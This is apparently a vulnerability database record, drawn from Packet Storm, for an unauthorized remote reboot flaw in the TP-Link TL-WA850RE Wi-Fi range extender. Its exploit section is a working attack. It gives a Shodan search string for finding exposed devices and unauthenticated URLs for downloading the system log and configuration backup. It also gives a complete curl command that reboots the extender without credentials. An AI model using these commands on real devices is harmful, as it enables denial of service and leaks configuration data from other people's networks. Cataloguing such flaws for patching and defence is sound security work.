ID

VAR-E-201804-0362


TITLE

TP-Link Technologies TL-WA850RE Wi-Fi Range Extender Unauthorized Remote Reboot

Trust: 0.5

sources: PACKETSTORM: 147397

DESCRIPTION

TP-Link Technologies TL-WA850RE Wi-Fi Range Extender suffers from an unauthorized remote reboot vulnerability.

Trust: 0.5

sources: PACKETSTORM: 147397

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wa850rescope: - version: -

Trust: 0.5

sources: PACKETSTORM: 147397

EXPLOIT

# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
# Date: 25/04/2018
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
# Category: dos

1. www.shodan.io (with title "Opening...")

"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE="

2. Proof of Concept


:System Log:
/data/systemlog.txt?operation=save

:Encrypted Configuration File:
/data/config.bin?operation=backup

:Reboot:
curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'

Trust: 0.5

sources: PACKETSTORM: 147397

EXPLOIT HASH

LOCAL

SOURCE

md5: 23502cfb730225f75e213d5693e508e8
sha-1: 6290b9e403e8cce7ccf238d8a671624ccee0d670
sha-256: 970a5397e04acea93596c1622e954fa7cc0a100eb23d4a5bf1fa9ecac096aba5
md5: 23502cfb730225f75e213d5693e508e8

Trust: 0.5

sources: PACKETSTORM: 147397

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 147397

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

sources: PACKETSTORM: 147397

CREDITS

Wadeek

Trust: 0.5

sources: PACKETSTORM: 147397

EXTERNAL IDS

db:PACKETSTORMid:147397

Trust: 0.5

sources: PACKETSTORM: 147397

SOURCES

db:PACKETSTORMid:147397

LAST UPDATE DATE

2022-07-27T09:39:55.726000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:147397date:2018-04-27T10:11:11